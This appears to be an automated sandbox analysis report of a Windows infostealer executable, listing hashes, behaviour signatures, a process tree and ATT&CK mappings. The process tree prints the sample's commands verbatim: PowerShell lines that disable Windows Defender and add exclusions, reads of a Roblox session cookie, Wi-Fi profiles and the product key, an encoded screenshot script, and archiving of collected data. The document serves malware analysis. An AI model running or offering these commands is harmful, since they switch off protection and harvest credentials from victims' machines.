Analysis

  • max time kernel
    92s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 02:11

General

  • Target

    e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d.exe

  • Size

    6.9MB

  • MD5

    030c3c535b2d8f10ceaeede6e3fe23f2

  • SHA1

    032ef2c8e717960d9b49dd7e48e4fc761cb4cfed

  • SHA256

    e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d

  • SHA512

    86499b8990f5f591927c7bdf6af18fe74400812104661ac870409ac5025cecc2bf29c890046f961d69b3a00c632bf6f05ac6b501e4b832769ba2f46258c29e35

  • SSDEEP

    98304:bFzHqdVfB2FS27wbuyuT/9vUIdD9C+z3zO917vOTh+ezDNh7xvmJ1nmOBN9n4mp3:b5QsJbT/9bvLz3S1bA3zgn97v3

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d.exe
    "C:\Users\Admin\AppData\Local\Temp\e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Users\Admin\AppData\Local\Temp\e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d.exe
      "C:\Users\Admin\AppData\Local\Temp\e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3152
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2420
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏   ‎.scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2712
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏   ‎.scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1928
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1276
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4520
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2556
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4248
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4576
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4852
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4304
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4424
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3032
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:2320
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1840
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
              PID:2312
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4836
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:640
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3764
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3216
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kv5kyyyi\kv5kyyyi.cmdline"
                5⤵
                  PID:3628
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E96.tmp" "c:\Users\Admin\AppData\Local\Temp\kv5kyyyi\CSCCD0AB949C6F047A0961D1E957A2EBE3.TMP"
                    6⤵
                      PID:3816
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4292
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:2504
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2464
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:980
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3516
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2884
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:3088
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:5096
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:3592
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:2832
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:1016
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2840
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:3648
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5048
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "getmac"
                                  3⤵
                                    PID:4716
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:992
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20002\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\MC4bw.zip" *"
                                      3⤵
                                        PID:3128
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI20002\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI20002\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\MC4bw.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:3940
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:3600
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic os get Caption
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1756
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                          3⤵
                                            PID:4960
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic computersystem get totalphysicalmemory
                                              4⤵
                                                PID:3856
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:2912
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                    PID:3216
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                  3⤵
                                                    PID:2472
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4448
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    3⤵
                                                      PID:636
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        4⤵
                                                        • Detects videocard installed
                                                        PID:2940
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      3⤵
                                                        PID:4592
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4852
                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    1⤵
                                                      PID:4292

                                                    Network

                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                    Execution

                                                    Command and Scripting Interpreter

                                                    1
                                                    T1059

                                                    PowerShell

                                                    1
                                                    T1059.001

                                                    Credential Access

                                                    Unsecured Credentials

                                                    2
                                                    T1552

                                                    Credentials In Files

                                                    2
                                                    T1552.001

                                                    Discovery

                                                    System Information Discovery

                                                    3
                                                    T1082

                                                    Process Discovery

                                                    1
                                                    T1057

                                                    Collection

                                                    Data from Local System

                                                    2
                                                    T1005

                                                    Command and Control

                                                    Web Service

                                                    1
                                                    T1102

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                      Filesize

                                                      2KB

                                                      MD5

                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                      SHA1

                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                      SHA256

                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                      SHA512

                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Filesize

                                                      944B

                                                      MD5

                                                      77d622bb1a5b250869a3238b9bc1402b

                                                      SHA1

                                                      d47f4003c2554b9dfc4c16f22460b331886b191b

                                                      SHA256

                                                      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                      SHA512

                                                      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Filesize

                                                      944B

                                                      MD5

                                                      59d97011e091004eaffb9816aa0b9abd

                                                      SHA1

                                                      1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                                                      SHA256

